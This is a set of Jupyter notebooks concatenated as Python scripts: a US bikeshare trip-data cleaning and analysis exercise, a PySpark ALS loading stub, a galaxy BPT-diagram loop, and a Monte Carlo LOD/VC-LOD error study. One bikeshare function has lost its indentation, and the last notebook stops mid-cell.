# It should also be observable from the above printout that each city provides different information. Even where the information is the same, the column names and formats are sometimes different. To make things as simple as possible when we get to the actual exploration, we should trim and clean the data. Cleaning the data makes sure that the data formats across the cities are consistent, while trimming focuses only on the parts of the data we are most interested in to make the exploration easier to work with.
#
# You will generate new data files with five values of interest for each trip: trip duration, starting month, starting hour, day of the week, and user type. Each of these may require additional wrangling depending on the city:
#
# - **Duration**: This has been given to us in seconds (New York, Chicago) or milliseconds (Washington). A more natural unit of analysis will be if all the trip durations are given in terms of minutes.
# - **Month**, **Hour**, **Day of Week**: Ridership volume is likely to change based on the season, time of day, and whether it is a weekday or weekend. Use the start time of the trip to obtain these values. The New York City data includes the seconds in their timestamps, while Washington and Chicago do not. The [`datetime`](https://docs.python.org/3/library/datetime.html) package will be very useful here to make the needed conversions.
# - **User Type**: It is possible that users who are subscribed to a bike-share system will have different patterns of use compared to users who only have temporary passes. Washington divides its users into two types: 'Registered' for users with annual, monthly, and other longer-term subscriptions, and 'Casual', for users with 24-hour, 3-day, and other short-term passes. The New York and Chicago data uses 'Subscriber' and 'Customer' for these groups, respectively. For consistency, you will convert the Washington labels to match the other two.
#
#
# **Question 3a**: Complete the helper functions in the code cells below to address each of the cleaning tasks described above.
# +
import datetime
def duration_in_mins(datum, city):
    """
    Take a dictionary with info about a single trip (datum) and its origin
    city (city) and return the trip duration in minutes.

    Washington stores duration in milliseconds under 'Duration (ms)';
    Chicago and NYC store seconds under 'tripduration'. The csv module
    delivers every field as a string, so values are converted to int first.
    """
    if city == "Washington":
        raw_ms = int(datum["Duration (ms)"])
        return datetime.timedelta(milliseconds=raw_ms).total_seconds() / 60
    return int(datum["tripduration"]) / 60
# Some tests to check that your code works. There should be no output if all of
# the assertions pass. The `example_trips` dictionary was obtained from when
# you printed the first trip from each of the original data files.
# Expected duration (in minutes) of the first trip in each city's file.
tests = {'NYC': 13.9833,
         'Chicago': 15.4333,
         'Washington': 7.1231}
for city in tests:
    # small tolerance because the expected values are rounded to 4 decimals
    assert abs(duration_in_mins(example_trips[city], city) - tests[city]) < .001
# +
def time_of_trip(datum, city):
    """
    Take a dictionary with info about a single trip (datum) and its origin
    city (city) and return the (month, hour, day_of_week) on which the
    trip was made.

    Washington stores the start time under 'Start date'; NYC and Chicago
    use 'starttime'. All three format it as 'month/day/year hh:mm[...]'
    (NYC additionally includes seconds, which this parsing ignores), so a
    single parsing path works once the right column is chosen. The
    original had three branches, two of them byte-identical.
    """
    # only the column name differs between cities
    key = 'Start date' if city == 'Washington' else 'starttime'
    date_part, time_part = datum[key].split()[:2]
    month, day, year = (int(x) for x in date_part.split('/'))
    day_of_week = datetime.date(year, month, day).strftime("%A")
    hour = int(time_part.split(":")[0])
    return (month, hour, day_of_week)
# Some tests to check that your code works. There should be no output if all of
# the assertions pass. The `example_trips` dictionary was obtained from when
# you printed the first trip from each of the original data files.
# Expected (month, hour, day_of_week) of the first trip in each city's file.
tests = {'NYC': (1, 0, 'Friday'),
         'Chicago': (3, 23, 'Thursday'),
         'Washington': (3, 22, 'Thursday')}
for city in tests:
    assert time_of_trip(example_trips[city], city) == tests[city]
# +
def type_of_user(datum, city):
    """
    Take a dictionary with info about a single trip (datum) and its origin
    city (city) and return the type of system user that made the trip.

    Washington labels riders 'Registered'/'Casual' under 'Member Type';
    NYC and Chicago already use 'Subscriber'/'Customer' under 'usertype',
    so Washington's labels are mapped onto the common vocabulary.
    """
    if city != "Washington":
        return datum["usertype"]
    return "Subscriber" if datum["Member Type"] == "Registered" else "Customer"
# Some tests to check that your code works. There should be no output if all of
# the assertions pass. The `example_trips` dictionary was obtained from when
# you printed the first trip from each of the original data files.
# Expected (normalized) user type of the first trip in each city's file.
tests = {'NYC': 'Customer',
         'Chicago': 'Subscriber',
         'Washington': 'Subscriber'}
for city in tests:
    assert type_of_user(example_trips[city], city) == tests[city]
# -
# **Question 3b**: Now, use the helper functions you wrote above to create a condensed data file for each city consisting only of the data fields indicated above. In the `/examples/` folder, you will see an example datafile from the [Bay Area Bike Share](http://www.bayareabikeshare.com/open-data) before and after conversion. Make sure that your output is formatted to be consistent with the example file.
def condense_data(in_file, out_file, city):
    """
    Read the full trip data from in_file and write the condensed data
    (duration, month, hour, day_of_week, user_type) to out_file. The city
    argument determines how the input file is parsed by the helpers.
    """
    with open(out_file, 'w') as f_out, open(in_file, 'r') as f_in:
        out_colnames = ['duration', 'month', 'hour', 'day_of_week', 'user_type']
        writer = csv.DictWriter(f_out, fieldnames=out_colnames)
        writer.writeheader()
        # condense each raw trip row into the five fields of interest
        for row in csv.DictReader(f_in):
            month, hour, weekday = time_of_trip(row, city)
            writer.writerow({
                'duration': duration_in_mins(row, city),
                'month': month,
                'hour': hour,
                'day_of_week': weekday,
                'user_type': type_of_user(row, city),
            })
# +
# Run this cell to check your work
# maps each city to its raw input file and condensed output file
city_info = {'Washington': {'in_file': './data/Washington-CapitalBikeshare-2016.csv',
                            'out_file': './data/Washington-2016-Summary.csv'},
             'Chicago': {'in_file': './data/Chicago-Divvy-2016.csv',
                         'out_file': './data/Chicago-2016-Summary.csv'},
             'NYC': {'in_file': './data/NYC-CitiBike-2016.csv',
                     'out_file': './data/NYC-2016-Summary.csv'}}
for city, filenames in city_info.items():
    condense_data(filenames['in_file'], filenames['out_file'], city)
    print_first_point(filenames['out_file'])
# -
#
# <a id='eda'></a>
# ## Exploratory Data Analysis
#
# Now that you have the data collected and wrangled, you're ready to start exploring the data. In this section you will write some code to compute descriptive statistics from the data. You will also be introduced to the `matplotlib` library to create some basic histograms of the data.
#
# <a id='statistics'></a>
# ### Statistics
#
# First, let's compute some basic counts. The first cell below contains a function that uses the csv module to iterate through a provided data file, returning the number of trips made by subscribers and customers. The second cell runs this function on the example Bay Area data in the `/examples/` folder. Modify the cells to answer the question below.
#
# **Question 4a**: Which city has the highest number of trips? Which city has the highest proportion of trips made by subscribers? Which city has the highest proportion of trips made by short-term customers?
#
# **Answer**: NYC has the highest number of trips (276,798). NYC also has the highest proportion of trips made by subscribers (88.83%), while Chicago has the highest proportion of trips made by short-term customers (23.77%).
def number_of_trips(filename):
    """
    Read a condensed trip-summary file and report usage split by user type.

    Returns a 7-tuple:
    (n_subscribers, n_customers, n_total,
     pct_subscribers, pct_customers, avg_subs_ride, avg_cust_ride)
    where the pct_* values are fractions of the total trip count and the
    avg_* values are mean trip durations in minutes.
    """
    n_subscribers = n_customers = 0
    total_subs_ride = total_cust_ride = 0.0
    with open(filename, 'r') as f_in:
        # tally counts and total minutes per user type
        for row in csv.DictReader(f_in):
            minutes = float(row['duration'])
            if row['user_type'] == 'Subscriber':
                n_subscribers += 1
                total_subs_ride += minutes
            else:
                n_customers += 1
                total_cust_ride += minutes
    n_total = n_subscribers + n_customers
    return (n_subscribers,
            n_customers,
            n_total,
            n_subscribers / n_total,
            n_customers / n_total,
            total_subs_ride / n_subscribers,
            total_cust_ride / n_customers)
data_file = ['./data/Washington-2016-Summary.csv','./data/Chicago-2016-Summary.csv','./data/NYC-2016-Summary.csv']
for path in data_file:
    # Call number_of_trips() ONCE per file; the original called it three
    # times per iteration, re-reading the whole csv from disk each time.
    n_subscribers, n_customers, n_total = number_of_trips(path)[:3]
    print(path.split("/")[2].split("-")[0])
    print("Total Number of Trips:",n_total)
    print("proportion of trips made by subscribers:",n_subscribers/n_total)
    print("proportion of trips made by short-term customers:",n_customers/n_total)
    print()
#
# Now, you will write your own code to continue investigating properties of the data.
#
# **Question 4b**: Bike-share systems are designed for riders to take short trips. Most of the time, users are allowed to take trips of 30 minutes or less with no additional charges, with overage charges made for trips of longer than that duration. What is the average trip length for each city? What proportion of rides made in each city are longer than 30 minutes?
#
# **Answer**: The average trip length for Washington is 18.93 min; the proportion of rides longer than 30 minutes is 10.84%.
# The average trip length for NYC is 15.81 min; the proportion of rides longer than 30 minutes is 7.30%.
# The average trip length for Chicago is 16.56 min; the proportion of rides longer than 30 minutes is 8.33%.
# +
def length_of_trips(filename):
    """
    Read a condensed trip-summary file and report duration statistics.

    Returns a 5-tuple:
    (len_total, n_total, avg_len, pcr_longride, pcr_shortride)
    — total minutes ridden, trip count, mean trip length in minutes, and
    the fractions of trips longer / no longer than 30 minutes.
    """
    n_shortride = n_longride = 0
    len_total = 0.0
    with open(filename, 'r') as f_in:
        for row in csv.DictReader(f_in):
            minutes = float(row['duration'])
            # 30 minutes is the typical free-ride threshold
            if minutes <= 30:
                n_shortride += 1
            else:
                n_longride += 1
            len_total += minutes
    n_total = n_shortride + n_longride
    return (len_total,
            n_total,
            len_total / n_total,
            n_longride / n_total,
            n_shortride / n_total)
# report average length and share of >30-minute rides for each city's file
data_file = ['./data/Washington-2016-Summary.csv','./data/NYC-2016-Summary.csv','./data/Chicago-2016-Summary.csv']
for path in data_file:
    len_total, n_total,avg_len,pcr_longride,pcr_shortride=length_of_trips(path)
    # city name is the first '-'-separated token of the file name
    city_name=path.split("/")[2].split("-")[0]
    print("The average trip length for {} is {:.2f}(min) the proportion of rides made are longer than 30 minutes is {:.2f}%".format(city_name,avg_len,pcr_longride*100))
# -
# **Question 4c**: Dig deeper into the question of trip duration based on ridership. Choose one city. Within that city, which type of user takes longer rides on average: Subscribers or Customers?
#
# **Answer**:The customer's in Washington takes longer rides on average.The average Subscriber trip duration is 13.68 (min), The average customer trip duration is 32.78 (min)
# +
# BUG FIX: `data_file` was rebound to a *list* of paths in the cell above,
# so number_of_trips(data_file) raised a TypeError when open() got a list.
# Question 4c looks at Washington, so pass that file explicitly — and call
# the file-reading function once instead of four times.
stats = number_of_trips('./data/Washington-2016-Summary.csv')
avg_subs_ride, avg_cust_ride = stats[5], stats[6]
if avg_subs_ride > avg_cust_ride:
    print('The subscriber\'s in Washington takes longer rides on average. The average Subscriber trip duration is {:.2f} (min),The average customer trip duration is {:.2f} (min)'.format(avg_subs_ride,avg_cust_ride))
else:
    print('The customer\'s in Washington takes longer rides on average.The average Subscriber trip duration is {:.2f} (min), The average customer trip duration is {:.2f} (min)'.format(avg_subs_ride,avg_cust_ride))
# -
# <a id='visualizations'></a>
# ### Visualizations
#
# The last set of values that you computed should have pulled up an interesting result. While the mean trip time for Subscribers is well under 30 minutes, the mean trip time for Customers is actually _above_ 30 minutes! It will be interesting for us to look at how the trip times are distributed. In order to do this, a new library will be introduced here, `matplotlib`. Run the cell below to load the library and to generate an example plot.
# +
# load library
import matplotlib.pyplot as plt
# %matplotlib inline
# example histogram, data taken from bay area sample
data = [ 7.65, 8.92, 7.42, 5.50, 16.17, 4.20, 8.98, 9.62, 11.48, 14.33,
19.02, 21.53, 3.90, 7.97, 2.62, 2.67, 3.08, 14.40, 12.90, 7.83,
25.12, 8.30, 4.93, 12.43, 10.60, 6.17, 10.88, 4.78, 15.15, 3.53,
9.43, 13.32, 11.72, 9.85, 5.22, 15.10, 3.95, 3.17, 8.78, 1.88,
4.55, 12.68, 12.38, 9.78, 7.63, 6.45, 17.38, 11.90, 11.52, 8.63,]
plt.hist(data)
plt.title('Distribution of Trip Durations')
plt.xlabel('Duration (m)')
plt.show()
# -
# In the above cell, we collected fifty trip times in a list, and passed this list as the first argument to the `.hist()` function. This function performs the computations and creates plotting objects for generating a histogram, but the plot is actually not rendered until the `.show()` function is executed. The `.title()` and `.xlabel()` functions provide some labeling for plot context.
#
# You will now use these functions to create a histogram of the trip times for the city you selected in question 4c. Don't separate the Subscribers and Customers for now: just collect all of the trip times and plot them.
# +
def list_trips(filename):
    """
    Read a condensed trip-summary file and return every trip duration
    (in minutes) as a list of floats.
    """
    with open(filename, 'r') as f_in:
        return [float(row['duration']) for row in csv.DictReader(f_in)]
data_file = './data/NYC-2016-Summary.csv'
# 10-minute-wide bins from 0 to 120 minutes
bins =[x for x in range(0,125,10)]
plt.hist(list_trips(data_file),bins)
plt.title('Distribution of NYC Trip Durations')
plt.xlabel('Duration (m)')
plt.show()
# -
# If you followed the use of the `.hist()` and `.show()` functions exactly like in the example, you're probably looking at a plot that's completely unexpected. The plot consists of one extremely tall bar on the left, maybe a very short second bar, and a whole lot of empty space in the center and right. Take a look at the duration values on the x-axis. This suggests that there are some highly infrequent outliers in the data. Instead of reprocessing the data, you will use additional parameters with the `.hist()` function to limit the range of data that is plotted. Documentation for the function can be found [[here]](https://matplotlib.org/devdocs/api/_as_gen/matplotlib.pyplot.hist.html#matplotlib.pyplot.hist).
#
# **Question 5**: Use the parameters of the `.hist()` function to plot the distribution of trip times for the Subscribers in your selected city. Do the same thing for only the Customers. Add limits to the plots so that only trips of duration less than 75 minutes are plotted. As a bonus, set the plots up so that bars are in five-minute wide intervals. For each group, where is the peak of each distribution? How would you describe the shape of each distribution?
#
# **Answer**: For NYC Customer trip durations, the peak is in the 20-25 min bin; for NYC Subscriber trip durations, the peak is in the 5-10 min bin. Both histograms are right-skewed.
# +
def list_trips(filename):
    """
    Read a condensed trip-summary file and return trip durations split by
    user type.

    Returns a tuple (subscriber_durations, customer_durations), each a
    list of floats in minutes.

    Fix: the original accumulated into module-level lists, so every call
    appended to the same lists — the plotting code below calls this twice,
    which doubled every count in the second histogram. The accumulator
    lists are now local, so each call starts fresh.
    """
    subscriber_data = []
    customer_data = []
    with open(filename, 'r') as f_in:
        reader = csv.DictReader(f_in)
        for row in reader:
            if row['user_type'] == 'Subscriber':
                subscriber_data.append(float(row['duration']))
            else:
                customer_data.append(float(row['duration']))
    return (subscriber_data, customer_data)
data_file = './data/NYC-2016-Summary.csv'
# 5-minute-wide bins, trips capped at 75 minutes
bins =[x for x in range(0,75,5)]
# NOTE(review): list_trips() re-reads the csv on each of the two calls
# below; consider calling it once and reusing the result.
plt.hist(list_trips(data_file)[0],bins)
plt.title('Distribution of NYC Subscriber Trip Durations')
plt.xlabel('Duration (m)')
plt.show()
plt.hist(list_trips(data_file)[1],bins)
plt.title('Distribution of NYC Customer Trip Durations')
plt.xlabel('Duration (m)')
plt.show()
# -
# <a id='eda_continued'></a>
# ## Performing Your Own Analysis
#
# So far, you've performed an initial exploration into the data available. You have compared the relative volume of trips made between three U.S. cities and the ratio of trips made by Subscribers and Customers. For one of these cities, you have investigated differences between Subscribers and Customers in terms of how long a typical trip lasts. Now it is your turn to continue the exploration in a direction that you choose. Here are a few suggestions for questions to explore:
#
# - How does ridership differ by month or season? Which month / season has the highest ridership? Does the ratio of Subscriber trips to Customer trips change depending on the month or season?
# - Is the pattern of ridership different on the weekends versus weekdays? On what days are Subscribers most likely to use the system? What about Customers? Does the average duration of rides change depending on the day of the week?
# - During what time of day is the system used the most? Is there a difference in usage patterns for Subscribers and Customers?
#
# If any of the questions you posed in your answer to question 1 align with the bullet points above, this is a good opportunity to investigate one of them. As part of your investigation, you will need to create a visualization. If you want to create something other than a histogram, then you might want to consult the [Pyplot documentation](https://matplotlib.org/devdocs/api/pyplot_summary.html). In particular, if you are plotting values across a categorical variable (e.g. city, user type), a bar chart will be useful. The [documentation page for `.bar()`](https://matplotlib.org/devdocs/api/_as_gen/matplotlib.pyplot.bar.html#matplotlib.pyplot.bar) includes links at the bottom of the page with examples for you to build off of for your own use.
#
# **Question 6**: Continue the investigation by exploring another question that could be answered by the data available. Document the question you want to explore below. Your investigation should involve at least two variables and should compare at least two groups. You should also use at least one visualization as part of your explorations.
#
# **Answer**: Ridership differs by season and city; winter has the fewest riders in all three cities.
# 
# Also, from the "Ratio of Subscriber trips to Customer trips" bar chart, winter has the highest ratio of Subscriber trips to Customer trips.
# +
import matplotlib.pyplot as plt
import numpy as np
def month_of_trips(filename):
with open(filename, 'r') as f_in:
reader = csv.DictReader(f_in)# set up csv reader object
winter =[12,1,2]
spring =[3,4,5]
summer =[6,7,8]
autumn = [9,10,11]
# initilization
#for subscriber
winter_sub = 0
spring_sub = 0
summer_sub = 0
autumn_sub = 0
#for coustemer
winter_cus = 0
spring_cus = 0
summer_cus = 0
autumn_cus = 0
#convert the data
for row in reader:
if row['user_type'] == 'Subscriber':
if int(row['month']) in winter:
winter_sub += 1
elif int(row['month']) in spring:
spring_sub += 1
elif int(row['month']) in summer:
summer_sub += 1
else:
autumn_sub += 1
else:
if int(row['month']) in winter:
winter_cus += 1
elif int(row['month']) in spring:
spring_cus += 1
elif int(row['month']) in summer:
summer_cus += 1
else:
autumn_cus += 1
subscriber_season ={"Winter": winter_sub,"Spring": spring_sub,"Summer": summer_sub, "Autumn":autumn_sub}
customer_season = {"Winter": winter_cus,"Spring": spring_cus,'Summer': summer_cus,'Autumn': autumn_cus}
n = {"Winter":winter_sub+winter_cus,"Spring": spring_sub+spring_cus,'Summer': summer_sub+summer_cus,'Autumn':autumn_sub+ autumn_cus}
return subscriber_season,customer_season,n
# For each city: print the busiest season and plot seasonal ridership by
# user type, plus the Subscriber/Customer ratio per season.
data_file = ['./data/Washington-2016-Summary.csv','./data/NYC-2016-Summary.csv', './data/Chicago-2016-Summary.csv']
for path in data_file:
    city_name=path.split("/")[2].split("-")[0]
    subscriber_season, customer_season,n = month_of_trips(path)
    maximum =max(n, key=n.get)
    maximum_sub = max(subscriber_season, key=subscriber_season.get)
    print("{}: {} has the highest ridership, which is {}, and {} has the highest subscriber ridership, which is {}"
          .format(city_name,maximum, n[maximum],maximum_sub, subscriber_season[maximum_sub]))
    x = [ k for k in subscriber_season ]
    y = [v for v in subscriber_season.values()]
    x_pos =np.arange(len(x))
    x2 = [ k for k in customer_season]
    y2 = [v for v in customer_season.values()]
    x2_pos =[i for i in range(len(x2))]
    plt.bar(x_pos,y, label ='Subscriber', color = 'r')
    plt.bar(x2_pos,y2, label ='Customer', color ='b')
    # BUG FIX: the title was hard-coded to 'Chicago' even though this loop
    # also plots Washington and NYC; use the current city's name instead
    # (and fix the 'Rideship' typo).
    plt.title('{} Subscriber & Customer Ridership Bar Charts'.format(city_name))
    plt.xlabel('Seasons')
    plt.ylabel('Number of Trips')
    plt.xticks(x_pos, ("Winter", "Spring","Summer","Autumn"))
    plt.show()
    ratio = [subscriber_season["Winter"]/customer_season["Winter"],
             subscriber_season["Spring"]/customer_season["Spring"],
             subscriber_season["Summer"]/customer_season["Summer"],
             subscriber_season["Autumn"]/customer_season["Autumn"]]
    x3 = [1,2,3,4]
    y3 = [v for v in ratio]
    plt.bar(x3,y3, label ='Ratio',color ='aqua')
    plt.xticks(x3, ("Winter", "Spring","Summer","Autumn"))
    plt.title('Ratio of Subscriber trips to Customer trips')
    plt.show()
# -
# <a id='conclusions'></a>
# ## Conclusions
#
# Congratulations on completing the project! This is only a sampling of the data analysis process: from generating questions, wrangling the data, and to exploring the data. Normally, at this point in the data analysis process, you might want to draw conclusions about the data by performing a statistical test or fitting the data to a model for making predictions. There are also a lot of potential analyses that could be performed on the data which are not possible with only the data provided. For example, detailed location data has not been investigated. Where are the most commonly used docks? What are the most common routes? As another example, weather has potential to have a large impact on daily ridership. How much is ridership impacted when there is rain or snow? Are subscribers or customers affected more by changes in weather?
#
# **Question 7**: Putting the bike share data aside, think of a topic or field of interest where you would like to be able to apply the techniques of data science. What would you like to be able to learn from your chosen subject?
#
# **Answer**: I would like to apply similar techniques to human activity data. That would allow us to predict what a person is going to do when they are in a given place or travelling, etc. I could create a chart of what a person does most often, learn about that person, and provide the services that fit them best.
#
# Convert this notebook to another format via nbconvert in a subprocess.
from subprocess import call
call(['python', '-m', 'nbconvert', 'Bike_Share_Analysis.ipynb'])
|
Explore-US-Bikeshare-Data/Bike_Share_Analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Set up Spark
# Locate the local Spark installation and make pyspark importable.
import findspark
findspark.init()
from pyspark import SparkContext, SparkConf, SQLContext
from pyspark.sql import SparkSession
# Single-node ('local') Spark context/session for the ALS recommender notebook.
conf=SparkConf().setAppName('ALS').setMaster('local')
sc=SparkContext.getOrCreate(conf=conf)
spark = SparkSession(sc)
# ## Import libraries
from matplotlib import pyplot as plt
from matplotlib.ticker import MaxNLocator
from pyspark.ml.recommendation import ALS
from pyspark.ml.evaluation import RegressionEvaluator
from pyspark.sql.types import IntegerType
from pyspark.sql.types import FloatType
from sklearn.metrics import ndcg_score
import pandas as pd
import numpy as np
import math
# ## Load Data
# +
# Load the movies CSV into a Spark DataFrame; stop Spark cleanly on failure.
# NOTE(review): hard-coded local Windows path — confirm it matches your machine.
path = "D:/Rutgers - MSCS/2nd Sem/CS550 (DM)/Proj/Data/movies.csv"
try:
    file_df = spark.read.csv(path, header=True)
    print("Pyspark Finish Loading")
except Exception:
    # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit still
    # propagate; release Spark resources before reporting the failure.
    spark.stop()
    print("ERROR")
|
jupyterNotebooks/Prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Produce and save a BPT diagram for each of the first 23 galaxies.
# NOTE(review): `Maps` and `plateifu_list` are defined in earlier cells not
# shown here — presumably marvin's Maps class and a list of plate-IFU ids;
# confirm, and confirm the ./BPT/ output directory exists.
for sample in range(23):
    maps = Maps(plateifu=plateifu_list[sample])
    # make a standard 3-plot BPT and retrieve the classifications
    masks, fig, axes = maps.get_bpt()
    fig.suptitle(str(sample)+'_'+plateifu_list[sample]+'_BPT',fontsize=18,y=0.95)
    fig.savefig('./BPT/'+str(sample)+'_'+plateifu_list[sample]+'.png')
|
bpt.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Monte Carlo simulation for Coefficient 2
#
#
# +
import os
import sys
import numpy as np
import scipy.sparse as sparse
import scipy.stats as stats
import random
import csv
# %matplotlib notebook
import matplotlib.pyplot as plt
from visualize import drawCoefficient
from data import *
from gridlod import interp, coef, util, fem, world, linalg, femsolver
import pg_rand, femsolverCoarse, buildcoef2d
from gridlod.world import World
# -
# ## Result function
def result(pglod, world, CoefClass, A, f, MC=1, prob=100):
    """Monte Carlo study of LOD vs. VC-LOD errors under random perturbations.

    For each of `MC` random perturbations of the coefficient (entries vanish
    with probability 1/prob), solves a fine reference FEM problem and the
    VC-LOD problem for each update percentage in `plist`, accumulating
    relative errors plus running means and 95% confidence intervals, which
    are written to disk via safer().

    Returns (a, mum): confidence half-widths and mean errors from the last
    processed sample/percentage.
    """
    NWorldFine = world.NWorldFine
    NWorldCoarse = world.NWorldCoarse
    NCoarseElement = world.NCoarseElement
    boundaryConditions = world.boundaryConditions
    NpFine = np.prod(NWorldFine+1)
    NpCoarse = np.prod(NWorldCoarse+1)
    # Percentages of correctors allowed to be updated (100% == full LOD).
    plist = [0,5,10,20,30,100]
    #### initial #####
    # Per-sample relative errors, one column per entry of plist.
    xmLoda = np.zeros([MC,np.size(plist)])
    xmVcLoda = np.zeros([MC,np.size(plist)])
    xmLodVcLoda = np.zeros([MC,np.size(plist)])
    ems = []
    # Running mean +/- confidence band traces for plotting (LOD, VC-LOD, LOD-vs-VC-LOD).
    plottingx = np.zeros([MC-1,np.size(plist)])
    plottingy = np.zeros([MC-1,np.size(plist)])
    plottingz = np.zeros([MC-1,np.size(plist)])
    plotting2x = np.zeros([MC-1,np.size(plist)])
    plotting2y = np.zeros([MC-1,np.size(plist)])
    plotting2z = np.zeros([MC-1,np.size(plist)])
    plotting3x = np.zeros([MC-1,np.size(plist)])
    plotting3y = np.zeros([MC-1,np.size(plist)])
    plotting3z = np.zeros([MC-1,np.size(plist)])
    for i in range(0,MC):
        print '_____Sample__ ' + str(i+1) + '/' + str(MC) + ' ____'
        # Randomly vanish coefficient entries (probability 1/probfactor).
        R = CoefClass.RandomVanish( probfactor = prob,
                                    PartlyVanish = None,
                                    Original = True)
        ANew = R.flatten()
        ###### Reference solution ######
        f_fine = np.ones(NpFine)
        uFineFem, AFine, MFine = femsolver.solveFine(world, ANew, f_fine, None, boundaryConditions)
        Anew = coef.coefficientFine(NWorldCoarse, NCoarseElement, ANew)
        ###### tolerance = 0 without computing ######
        # With tol=0 and Computing=None this only flags affected correctors
        # and returns error indicators `eps`, without recomputation.
        vis, eps = pglod.updateCorrectors(Anew, 0, f, 1, clearFineQuantities=False, mc=True, Computing=None)
        print 'Affected correctors: ' + str(np.sum(vis))
        ##### VCLOD ######
        uVc = []
        updated = 0
        for p in plist:
            print 'p = ' + str(p) + '%',
            uVcLod, updated = VcLod(pglod, world, Anew, eps, updated, numberofcorrectors=p)
            if p == 100:
                # p == 100 is the fully-updated LOD reference; reset correctors after.
                uLod = uVcLod
                pglod.CorrectorsToOrigin()
            else:
                uVc.append(uVcLod)
        for k in range(0,np.shape(uVc)[0]):
            uVcLod = uVc[k]
            # Relative M-weighted errors vs. the fine reference and vs. full LOD.
            eVcLod = np.sqrt(np.dot(uFineFem - uVcLod, MFine*(uFineFem - uVcLod))) / np.sqrt(np.dot(uFineFem, MFine*uFineFem))
            eLodVcLod = np.sqrt(np.dot(uVcLod - uLod, MFine*(uVcLod - uLod))) / np.sqrt(np.dot(uLod, MFine*uLod))
            eLod = np.sqrt(np.dot(uFineFem - uLod, MFine*(uFineFem - uLod))) / np.sqrt(np.dot(uFineFem, MFine*uFineFem))
            xmLoda[i,k] = eLod
            xmVcLoda[i,k] = eVcLod
            xmLodVcLoda[i,k] = eLodVcLod
        # Confidence intervals need at least two samples.
        if i == 0:
            continue
        ems.append(i+1)
        for k in range(0,np.shape(uVc)[0]):
            # Running mean over the first i+1 samples.
            muLod = 0
            muVcLod = 0
            muLodVcLod = 0
            for j in range(0,i+1):
                muLod += xmLoda[j,k]
                muVcLod += xmVcLoda[j,k]
                muLodVcLod += xmLodVcLoda[j,k]
            muLod /= i+1
            muVcLod /= i+1
            muLodVcLod /= i+1
            # Unbiased sample variance (divide by i == n-1).
            sig2Lod = 0
            sig2VcLod = 0
            sig2LodVcLod = 0
            for j in range(0,i+1):
                sig2Lod += (xmLoda[j,k]-muLod)**(2)
                sig2VcLod += (xmVcLoda[j,k]-muVcLod)**(2)
                sig2LodVcLod += (xmLodVcLoda[j,k]-muLodVcLod)**(2)
            sig2Lod /= i
            sig2VcLod /= i
            sig2LodVcLod /= i
            # 95% confidence half-widths: 1.96 * standard error.
            a = [np.sqrt(sig2Lod)/np.sqrt(i+1)*1.96,np.sqrt(sig2VcLod)/np.sqrt(i+1)*1.96,np.sqrt(sig2LodVcLod)/np.sqrt(i+1)*1.96]
            mum = [muLod,muVcLod,muLodVcLod]
            plottingx[i-1,k] = mum[0]-a[0]
            plottingy[i-1,k] = mum[0]
            plottingz[i-1,k] = mum[0]+a[0]
            plotting2x[i-1,k] = mum[1]-a[1]
            plotting2y[i-1,k] = mum[1]
            plotting2z[i-1,k] = mum[1]+a[1]
            plotting3x[i-1,k] = mum[2]-a[2]
            plotting3y[i-1,k] = mum[2]
            plotting3z[i-1,k] = mum[2]+a[2]
            Matrix = CoefClass.Matrix.flatten()
            ROOT = '../test_data/MonteCarlo/Coef2/p' + str(100/prob) + '/' + str(plist[k])
            safer(ROOT, mum, a, plottingx[:,k], plottingy[:,k], plottingz[:,k], plotting2x[:,k], plotting2y[:,k], plotting2z[:,k], plotting3x[:,k], plotting3y[:,k], plotting3z[:,k], ems, Matrix)
    # NOTE(review): if MC == 1 the loop `continue`s on i == 0 and `a`/`mum` are
    # never assigned, so this return would raise NameError — confirm MC > 1.
    return a,mum
# ## VC-LOD
def VcLod(pglod, world, Anew, eps, updated = 0,
          numberofcorrectors=5):
    """Solve the coarse VC-LOD problem, updating only the `numberofcorrectors`
    percent of correctors with the largest error indicators in `eps`.

    Returns (uVcLod, updated): the solution prolongated to the fine mesh via
    the corrected basis, and the cumulative count of updated correctors.

    NOTE(review): relies on the module-level right-hand side `f` (it is not a
    parameter) — confirm the global `f` matches the intended coarse load.
    """
    NWorldFine = world.NWorldFine
    NWorldCoarse = world.NWorldCoarse
    NCoarseElement = world.NCoarseElement
    boundaryConditions = world.boundaryConditions
    NpFine = np.prod(NWorldFine+1)
    NpCoarse = np.prod(NWorldCoarse+1)
    ##### tolerance = certain ######
    # Drop zero indicators, sort ascending (Python 2: filter returns a list).
    eps = filter(lambda x: x!=0, eps)
    eps.sort()
    epssize = np.size(eps)
    # Number of correctors to update, rounded up.
    until = int(round((numberofcorrectors/100. * epssize) +0.49,0))
    if epssize != 0:
        until = int(round((until * 256./epssize)+0.49,0))
    # Indicators in descending order.
    tolrev = []
    for i in range(epssize-1,-1,-1):
        tolrev.append(eps[i])
    if epssize == 0:
        print 'nothing to update'
    else:
        # Tolerance below which correctors are left untouched.
        if until >= epssize:
            tol = 0
        else:
            tol = tolrev[until]
        vistol = pglod.updateCorrectors(Anew, tol, f, clearFineQuantities=False, mc=True, Testing=True)
        updated += np.sum(vistol)
        print 'Updated correctors: ' + str(updated)
    # Assemble and solve the coarse multiscale system on interior nodes.
    KFull = pglod.assembleMsStiffnessMatrix()
    MFull = fem.assemblePatchMatrix(NWorldCoarse, world.MLocCoarse)
    free = util.interiorpIndexMap(NWorldCoarse)
    bFull = MFull*f
    KFree = KFull[free][:,free]
    bFree = bFull[free]
    xFree = sparse.linalg.spsolve(KFree, bFree)
    # Prolongate the coarse solution to the fine mesh via the corrected basis.
    basis = fem.assembleProlongationMatrix(NWorldCoarse, NCoarseElement)
    basisCorrectors = pglod.assembleBasisCorrectors()
    modifiedBasis = basis - basisCorrectors
    xFull = np.zeros(NpCoarse)
    xFull[free] = xFree
    uCoarse = xFull
    uVcLod = modifiedBasis*xFull
    return uVcLod, updated
# +
# Driver: build the 2-D coefficient, precompute the original correctors, then
